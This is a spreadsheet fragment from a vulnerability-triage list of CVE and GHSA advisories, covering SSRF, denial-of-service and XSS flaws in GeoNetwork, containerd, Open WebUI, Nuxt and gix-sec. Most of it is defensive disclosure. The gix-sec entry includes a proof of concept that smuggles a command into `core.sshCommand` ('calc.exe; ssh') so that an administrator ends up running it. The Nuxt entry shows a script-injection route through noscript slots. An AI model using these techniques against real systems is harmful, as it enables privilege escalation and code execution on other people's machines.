          <t xml:space="preserve">smol-toml </t>
        </is>
      </c>
      <c r="S5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85730</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55864</t>
        </is>
      </c>
      <c r="D6" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E6" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F6" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G6" s="5" t="inlineStr"/>
      <c r="H6" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I6" s="5" t="inlineStr"/>
      <c r="J6" s="5" t="inlineStr"/>
      <c r="K6" s="5" t="inlineStr"/>
      <c r="L6" s="5" t="inlineStr">
        <is>
          <t>maven:org.geonetwork-opensource:gn-web-app</t>
        </is>
      </c>
      <c r="M6" s="5" t="inlineStr">
        <is>
          <t>4.2.17, 4.4.12</t>
        </is>
      </c>
      <c r="N6" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O6" s="5" t="inlineStr"/>
      <c r="P6" s="5" t="inlineStr"/>
      <c r="Q6" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R6" s="5" t="inlineStr">
        <is>
          <t>### Summary
An unauthenticated server-side request forgery vulnerability lets any anonymous user make the GeoNetwork server issue arbitrary outbound HTTP requests. This gives an external attacker a position inside the server's network, making it possible to make internal requests no matter if the response is XML-type or not.
The SLD tooling endpoint `POST /api/tools/ogc/sld` takes a caller-supplied **WMS server URL** and performs a **server-side HTTP GET** to it, with no validation. The fetched body can also be stored and downloaded if the output of the outbound request is in XML format, making the SSRF non-blind.
### Impact
Any unauthenticated user can make the server send arbitrary HTTP requests to internal hosts it would never expose publicly, and read the responses back if the request responses are XML. This enables internal data disclosure, for example, configuration files that return as XML, authorization bypass, and reconnaissance of the internal network all from an anonymous position.
### Resolution 
Patched releases:
* 4.4.12
* 4.2.17
### Resources
* https://github.com/geonetwork/core-geonetwork/pull/9343</t>
        </is>
      </c>
      <c r="S6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55864</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87819</t>
        </is>
      </c>
      <c r="D7" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E7" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F7" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G7" s="5" t="inlineStr"/>
      <c r="H7" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I7" s="5" t="inlineStr"/>
      <c r="J7" s="5" t="inlineStr"/>
      <c r="K7" s="5" t="inlineStr">
        <is>
          <t>gitpython_project:gitpython</t>
        </is>
      </c>
      <c r="L7" s="5" t="inlineStr">
        <is>
          <t>PyPI:gitpython</t>
        </is>
      </c>
      <c r="M7" s="5" t="inlineStr">
        <is>
          <t>3.1.60</t>
        </is>
      </c>
      <c r="N7" s="5" t="inlineStr">
        <is>
          <t>NVD, OSV</t>
        </is>
      </c>
      <c r="O7" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P7" s="5" t="inlineStr"/>
      <c r="Q7" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="R7"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S7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87819</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87818</t>
        </is>
      </c>
      <c r="D8" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E8" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F8" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G8" s="5" t="inlineStr"/>
      <c r="H8" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I8" s="5" t="inlineStr"/>
      <c r="J8" s="5" t="inlineStr"/>
      <c r="K8" s="5" t="inlineStr">
        <is>
          <t>gitpython_project:gitpython</t>
        </is>
      </c>
      <c r="L8" s="5" t="inlineStr">
        <is>
          <t>PyPI:gitpython</t>
        </is>
      </c>
      <c r="M8" s="5" t="inlineStr">
        <is>
          <t>3.1.60</t>
        </is>
      </c>
      <c r="N8" s="5" t="inlineStr">
        <is>
          <t>NVD, OSV</t>
        </is>
      </c>
      <c r="O8" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P8" s="5" t="inlineStr"/>
      <c r="Q8" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="R8"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S8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87818</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53495</t>
        </is>
      </c>
      <c r="D9" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E9" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F9" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G9" s="5" t="inlineStr"/>
      <c r="H9" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I9" s="5" t="inlineStr"/>
      <c r="J9" s="5" t="inlineStr"/>
      <c r="K9" s="5" t="inlineStr"/>
      <c r="L9" s="5" t="inlineStr">
        <is>
          <t>go:github.com/containerd/containerd, go:github.com/containerd/containerd/v2</t>
        </is>
      </c>
      <c r="M9" s="5" t="inlineStr">
        <is>
          <t>1.7.35, 2.0.12, 2.2.8, 2.3.5</t>
        </is>
      </c>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr"/>
      <c r="P9" s="5" t="inlineStr"/>
      <c r="Q9" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R9" s="5" t="inlineStr">
        <is>
          <t>### Impact
A bug in containerd's CRI ExecSync implementation allows exec probes and lifecycle hooks with background child processes to keep containerd's stdio-drain goroutines indefinitely blocked. Because the I/O drain phase lacks a default timeout or context cancellation handling, repeated ExecSync invocations (like probes) that include long-lived background processes against a container can cause containerd to leak goroutines and host memory. Over time, this resource exhaustion can cause the containerd daemon to be terminated by the OOM killer, rendering containerd unavailable until it is restarted. This issue affects containerd on Linux systems running with the CRI plugin enabled. Users not using containerd's CRI implementation or not running containers on Linux are not affected.
### Patches
This bug has been fixed in containerd 2.3.5, 2.2.8, 2.0.12, and 1.7.35. Users should update to these versions to resolve the issue.
### Workarounds
Ensure exec probes and lifecycle hooks do not launch long-lived background child processes.
### Credits
The containerd project would like to thank XlabAI Team of Tencent Xuanwu Lab (xlabai@tencent.com), including Guannan Wang, Zhanpeng Liu, Jiashuo Liang, and Guancheng Li, and @IamwhatIamSY who independently discovered and responsibly disclosed this issue in accordance with the [containerd security policy](https://github.com/containerd/project/blob/main/SECURITY.md).
### For more information
If there are any questions or comments about this advisory:
* Open an issue in [containerd](https://github.com/containerd/containerd/issues/new/choose)
* Send an email to [security@containerd.io](mailto:security@containerd.io)
To report a security issue in containerd:
* [Report a new vulnerability](https://github.com/containerd/containerd/security/advisories/new)
* Send an email to [security@containerd.io](mailto:security@containerd.io)</t>
        </is>
      </c>
      <c r="S9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53495</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88000</t>
        </is>
      </c>
      <c r="D10" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E10" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F10" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G10" s="5" t="inlineStr"/>
      <c r="H10" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I10" s="5" t="inlineStr"/>
      <c r="J10" s="5" t="inlineStr"/>
      <c r="K10" s="5" t="inlineStr">
        <is>
          <t>openwebui:open_webui</t>
        </is>
      </c>
      <c r="L10" s="5" t="inlineStr">
        <is>
          <t>pip:open-webui</t>
        </is>
      </c>
      <c r="M10" s="5" t="inlineStr">
        <is>
          <t>0.11.1</t>
        </is>
      </c>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P10" s="5" t="inlineStr"/>
      <c r="Q10" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="R10" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.10.0 until 0.11.1, DELETE /api/v1/chats/{id}/messages/{message_id} used the chat-history deletion helper in backend/open_webui/models/chats.py to follow childrenIds without recording visited message identifiers. An authenticated user could store a cyclic chat tree and delete a message, causing a synchronous infinite loop on the server request loop that blocked every user's requests until the process was killed. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="S10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88000</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88002</t>
        </is>
      </c>
      <c r="D11" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E11" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F11" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G11" s="5" t="inlineStr"/>
      <c r="H11" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I11" s="5" t="inlineStr"/>
      <c r="J11" s="5" t="inlineStr"/>
      <c r="K11" s="5" t="inlineStr">
        <is>
          <t>openwebui:open_webui</t>
        </is>
      </c>
      <c r="L11" s="5" t="inlineStr">
        <is>
          <t>pip:open-webui</t>
        </is>
      </c>
      <c r="M11" s="5" t="inlineStr">
        <is>
          <t>0.11.1</t>
        </is>
      </c>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P11" s="5" t="inlineStr"/>
      <c r="Q11" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="R11" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.5.0 until 0.11.1, the message-chain reconstruction helper in backend/open_webui/utils/misc.py advanced through a chat history by map key but tracked visited entries using each message body's optional id field. An authenticated user could store id-less messages in a parent cycle and trigger a non-terminating walk that blocked the async event loop, grew memory until termination, and remained persistent across process restarts. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="S11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88002</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88001</t>
        </is>
      </c>
      <c r="D12" s="5" t="n">
        <v>5</v>
      </c>
      <c r="E12" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F12" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G12" s="5" t="inlineStr"/>
      <c r="H12" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I12" s="5" t="inlineStr"/>
      <c r="J12" s="5" t="inlineStr"/>
      <c r="K12" s="5" t="inlineStr">
        <is>
          <t>openwebui:open_webui</t>
        </is>
      </c>
      <c r="L12" s="5" t="inlineStr">
        <is>
          <t>pip:open-webui</t>
        </is>
      </c>
      <c r="M12" s="5" t="inlineStr">
        <is>
          <t>0.11.1</t>
        </is>
      </c>
      <c r="N12" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O12" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P12" s="5" t="inlineStr"/>
      <c r="Q12" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R12" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.9.5 until 0.11.1, server-side web fetches did not reapply WEB_FETCH_FILTER_LIST or private-address controls to HTTP redirect destinations when AIOHTTP_CLIENT_ALLOW_REDIRECTS was enabled. An authenticated user could redirect the aiohttp and requests fetch paths to excluded hosts, loopback, private networks, or cloud metadata services and route resulting content into web search, URL ingestion, page-fetch tools, or chat image processing. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="S12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88001</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56317</t>
        </is>
      </c>
      <c r="D13" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E13" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F13" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G13" s="5" t="inlineStr"/>
      <c r="H13" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I13" s="5" t="inlineStr"/>
      <c r="J13" s="5" t="inlineStr"/>
      <c r="K13" s="5" t="inlineStr"/>
      <c r="L13" s="5" t="inlineStr">
        <is>
          <t>npm:nuxt</t>
        </is>
      </c>
      <c r="M13" s="5" t="inlineStr">
        <is>
          <t>3.21.7, 4.4.7</t>
        </is>
      </c>
      <c r="N13" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O13" s="5" t="inlineStr"/>
      <c r="P13" s="5" t="inlineStr"/>
      <c r="Q13" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R13" s="5" t="inlineStr">
        <is>
          <t>### Impact
Nuxt's globally registered `&lt;NoScript&gt;` component (from `@unhead/vue` head components, re-exported by Nuxt) wrote its default-slot content to the `innerHTML` of the `&lt;noscript&gt;` head tag, bypassing the HTML escaping that `{{ }}` interpolation normally applies in Vue templates.
Applications that placed untrusted, attacker-controllable data inside a `&lt;NoScript&gt;` slot, for example:
```vue
&lt;NoScript&gt;{{ route.query.banner }}&lt;/NoScript&gt;
```
would emit that value unescaped inside `&lt;noscript&gt;` in the server-rendered HTML. With scripting enabled, the HTML parser treats `&lt;noscript&gt;` content in `&lt;head&gt;` under the "in head noscript" insertion mode: any tag other than `link`, `meta`, `noframes`, or `style` implicitly closes `&lt;noscript&gt;` and is re-processed in the head. A payload such as `&lt;script&gt;...&lt;/script&gt;` therefore escapes the element and executes in the document context.
Sibling head components (`&lt;Style&gt;`, `&lt;Title&gt;`) were not affected because they already routed slot text through the safe `textContent` path.
### Affected versions
All currently supported versions of `nuxt` that ship the `&lt;NoScript&gt;` global component.
### Patches
Fixed in `nuxt@4.4.7` (commit [`4b054e9d`](https://github.com/nuxt/nuxt/commit/4b054e9d95f8daf366cb144b52782047c511a66e)) and backported to `nuxt@3.21.7` (commit [`7fea9fd6`](https://github.com/nuxt/nuxt/commit/7fea9fd687f1dacbfb63db5fae5839896b017a0e)). The fix escapes `&lt;NoScript&gt;` slot content with `escapeHtml` from `@vue/shared` and writes it to `textContent` rather than `innerHTML`. Slot content is now rendered as text; intentional markup inside `&lt;NoScript&gt;` is no longer parsed as HTML.
### Workarounds
Until you can upgrade:
- Do not interpolate untrusted input into `&lt;NoScript&gt;` slots. Replace `&lt;NoScript&gt;{{ x }}&lt;/NoScript&gt;` with a static string, or sanitise / HTML-escape `x` at the source.
- If you must render dynamic noscript content, write the tag yourself via `useHead({ noscript: [{ textContent: escapedValue }] })` after escaping `escapedValue`.
### Credit
Reported to Anthropic's coordinated vulnerability disclosure pipeline by Claude (Anthropic's AI assistant) and triaged by the Anthropic security team. Reference: ANT-2026-4NJYDFFM.
Independently reported by [@alcls01111](https://github.com/alcls01111) via GitHub's coordinated disclosure flow (`GHSA-8grp-wcq9-925q`), closed as a duplicate of this advisory.</t>
        </is>
      </c>
      <c r="S13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56317</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>GHSA-xppm-jmw6-fhmf</t>
        </is>
      </c>
      <c r="D14" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E14" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F14" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G14" s="5" t="inlineStr"/>
      <c r="H14" s="5" t="inlineStr"/>
      <c r="I14" s="5" t="inlineStr"/>
      <c r="J14" s="5" t="inlineStr"/>
      <c r="K14" s="5" t="inlineStr"/>
      <c r="L14" s="5" t="inlineStr">
        <is>
          <t>npm:nuxt</t>
        </is>
      </c>
      <c r="M14" s="5" t="inlineStr">
        <is>
          <t>3.21.7, 4.4.7</t>
        </is>
      </c>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr"/>
      <c r="P14" s="5" t="inlineStr"/>
      <c r="Q14" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R14" s="5" t="inlineStr">
        <is>
          <t>### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-m3q2-p4fw-w38m. This link is maintained to preserve external references.
### Original Description
Nuxt before 4.4.7 (and the 3.x branch before 3.21.7) contains a cross-site scripting vulnerability in the NoScript component that writes slot content to innerHTML without escaping. Attackers can inject malicious scripts through untrusted data in NoScript slots, such as route.query parameters, which execute in the document context when the noscript tag is implicitly closed by script tags.</t>
        </is>
      </c>
      <c r="S14" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-xppm-jmw6-fhmf</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-24890</t>
        </is>
      </c>
      <c r="D15" s="5" t="inlineStr"/>
      <c r="E15" s="5" t="inlineStr"/>
      <c r="F15" s="5" t="inlineStr"/>
      <c r="G15" s="5" t="inlineStr"/>
      <c r="H15" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I15" s="5" t="inlineStr"/>
      <c r="J15" s="5" t="inlineStr"/>
      <c r="K15" s="5" t="inlineStr"/>
      <c r="L15" s="5" t="inlineStr">
        <is>
          <t>rust:gix-sec</t>
        </is>
      </c>
      <c r="M15" s="5" t="inlineStr">
        <is>
          <t>0.13.3</t>
        </is>
      </c>
      <c r="N15" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O15" s="5" t="inlineStr"/>
      <c r="P15" s="5" t="inlineStr"/>
      <c r="Q15" s="5" t="inlineStr">
        <is>
          <t>CWE-283</t>
        </is>
      </c>
      <c r="R15" s="5" t="inlineStr">
        <is>
          <t>### Summary
In a process run with full administrative rights on Windows, `gix-sec` wrongly treats all locations as trusted, leading to the execution of commands configured in repositories controlled by limited user accounts.
### Details
In a similar way to Git, gitoxide tries to avoid operating in local repositories that it neither considers to be owned by the current user nor finds to match any value of `safe.directory`. [This is because](https://git-scm.com/docs/git.html#_security) of the numerous commands that can be configured for a Git repository, to run as part of various actions, some of which even occur automatically due to the way custom shell prompts and text editors update their knowledge of repositories.
On Unix-like operating systems, every directory is considered to be owned by some user ID. On Windows, other identities can own a directory in the same sense that a user can, and directories created while operating with full administrative rights default to being owned by the `Administrators` group, not the specific user. Such administrators should be able to use what are, conceptually, their own repositories. So Git considers administrators (when operating this way) to own them.
Code in `gix-sec` intends to implement a similar check. But after finding that it is run with an administrative token, it needs to check if the directory is owned by the `Administrators` group, yet instead accidentally examines *itself* again, rather than the directory.
Specifically, in `gix_sec::identity` the [implementation](https://github.com/GitoxideLabs/gitoxide/blob/main/gix-sec/src/identity.rs#L81) of `is_path_owned_by_current_user` for Windows [finds the owner of the directory](https://github.com/GitoxideLabs/gitoxide/blob/ffb73b5f69dbe86ff88f1c473af65f368a6bcbe5/gix-sec/src/identity.rs#L109-L121) (`folder_owner`), [finds the owner of the running thread or process](https://github.com/GitoxideLabs/gitoxide/blob/ffb73b5f69dbe86ff88f1c473af65f368a6bcbe5/gix-sec/src/identity.rs#L151-L189) (`token_owner`), checks cases of ownership not specific to administrators, then attempts to check the administrator-specific case with:
https://github.com/GitoxideLabs/gitoxide/blob/ffb73b5f69dbe86ff88f1c473af65f368a6bcbe5/gix-sec/src/identity.rs#L197-L207
The [`IsWellKnownSid`](https://learn.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-iswellknownsid) call checks if the owner of the current thread or process is the `Administrators` group. By default, operations carried out when running as an administrator with UAC elevation--or using an administrative account for which UAC is turned off altogether--create not just files and directories with the `Administrators` group as the owner, but other [securable objects](https://learn.microsoft.com/en-us/windows/win32/secauthz/securable-objects) as well, including processes and threads. So this check returns true. (Based on the comment, it may be that this was really meant to check if the *directory* is owned by an administrator. But nothing related to the directory appears in this check.)
The [`CheckTokenMembership`](https://learn.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-checktokenmembership) call checks if the owner of the current thread or process is an identity enabled in the access token represented by the token handle of `NULL`, passed as `0`. But a token handle of `NULL` represents the running thread. Consequently, if we have gotten this far--which happens when running with full administrative rights--in nearly all situations this will return true as well. (Based on the message, it may be that this was really meant to check if the user is an *administrator*. But nothing related to the `Administrators` group appears in this check.)
### PoC
These examples use `gix fetch` for simplicity, but some other actions implemented in gitoxide are vulnerable, as well as any provided by applications that rely on the results of `gix-sec` checks. 
#### Example 1: From inside a shared or user profile directory
On Windows, running as a limited user account, create a repository in a shared location like `C:\Users\Public`, or even within the limited user's user profile directory. Configure a fake (or, if preferred, real) remote and a value of `core.sshCommand` that runs an arbitrary payload. For example, in PowerShell:
```powershell
git init unsafe-repo
cd unsafe-repo
git remote add origin ssh://localhost/repo.git
git config core.sshCommand 'calc.exe; ssh'
```
Switch from the limited account to an administrative account. Then:
1. If gitoxide is not installed, install it, such as with `cargo install gitoxide`.
2. Run PowerShell with UAC elevation, so that it and processes started in it have an unfiltered token. (If UAC is turned off for this account, then just run PowerShell normally.)
3. This example will not work if the `GIT_SSH_COMMAND` environment variable is set. It is not usually set, but if it may be, you can unset it in the current shell environment by running `$env:GIT_SSH_COMMAND = $null`.
4. `cd` to the limited user's repository as created above.
5. Run `gix fetch`. This runs the Windows calculator (the chosen payload).
#### Example 2: From anywhere
On Windows, even limited user accounts can create directories in the root of the system drive. As a limited user--and assuming the system drive is `C:`--initialize `C:\` itself as a repository. Set up the repository to run the payload, either by editing `C:\.git\config` manually, or by running the `git remote` and `git config` commands from example 1 but passing `-c safe.directory=.`. The second approach is as follows:
```powershell
cd C:\
git init
git -c safe.directory=. remote add origin ssh://localhost/repo.git
git -c safe.directory=. config core.sshCommand 'calc.exe; ssh'
```
(`-c safe.directory=.` keeps `git` from refusing to run the `git remote` and `git config` commands on the repository it has just created, whose `.git` directory is under its control but whose working tree is not.)
The entire system drive is now a Git repository due to the presence of `C:\.git`. The limited user owns this `.git` directory and controls the configuration in it. Normally `safe.directory` protections keep this from being a problem. But they are ineffective for administrators running applications (such as the `gix` command) that use `gix-sec` to enforce those protections.
Switch from the limited account to an administrative account. Follow the instructions for the administrator from example 1, except do so from *any* directory anywhere on the `C:` drive that is not in its own repository. Unless `GIT_CEILING_DIRECTORIES` is set in such a way that keeps `C:\` from being considered, running `gix fetch` again runs the Windows calculator. This happens even if the command is run from inside the administrator's own user profile directory.
### Impact
A user is affected only when *all* of the following apply:
- The operating system is Windows.
- The user is a member of the `Administrators` group.
- The program is run with the user's unfiltered token. This happens when UAC is enabled and the user runs the program with UAC elevation, as well as when UAC is disabled. (Running as an administrator but enabling UAC and running the program unelevated is sufficient to avoid this vulnerability.)
- The program uses and relies on information from `gix-sec` about what directories to trust.
- The program interacts with a repository owned by, and set up or controlled by, another user.
Then operations that would run code present in a repository's configuration or hooks when the repository is trusted will be performed in any repository. These operations often require user interaction. But this interaction may not seem to the user like it involves operations on a repository, if it is performed as part of a custom prompt for a shell, or by other software that integrates with repositories. It may also not seem like it involves operation on files controlled by another user, such as when the repository is the root of the system drive.
A malicious user with a limited account on the system may therefore be able to arrange for an administrator to run arbitrary code. However, this vulnerability does not affect cloning repositories or using repositories one has cloned, because cloning does not copy configuration and hooks into the local repository.
The specific attack of making the root of the system drive a repository resembles [CVE-2022-24765](https://github.com/git-for-windows/git/security/advisories/GHSA-vw2c-22j4-2fh2). The workarounds presented there do not work around this vulnerability in full, but would prevent that kind of attack.</t>
        </is>
      </c>
      <c r="S15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-24890</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-24978</t>
        </is>
      </c>
      <c r="D16" s="5" t="inlineStr"/>
      <c r="E16" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F16" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G16" s="5" t="inlineStr"/>
      <c r="H16" s="5" t="inlineStr"/>
      <c r="I16" s="5" t="inlineStr"/>
      <c r="J16" s="5" t="inlineStr"/>
      <c r="K16" s="5" t="inlineStr"/>
      <c r="L16" s="5" t="inlineStr">
        <is>
          <t>go:github.com/lf-edge/ekuiper/v2</t>
        </is>
      </c>
      <c r="M16" s="5" t="inlineStr">
        <is>
          <t>2.4.0</t>
        </is>
      </c>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr"/>
      <c r="P16" s="5" t="inlineStr"/>
      <c r="Q16" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R16" s="5" t="inlineStr">
        <is>
          <t>### Summary
A Cross-Site Scripting (XSS) vulnerability in external service creation allows an authenticated attacker to inject HTML/script payloads into external service names, which may execute in a user's browser when rendered by administrative web interfaces.
### Details
Prior to v2.4.0, external service registration endpoints did not strictly enforce alphanumeric character restrictions on service names. An operator or attacker with API access could register a service using a crafted name containing HTML elements (such as `&lt;iframe src="..."&gt;`). If an administrative web UI rendered the unescaped service name, arbitrary script execution could occur in the context of the user's browser session.
### PoC
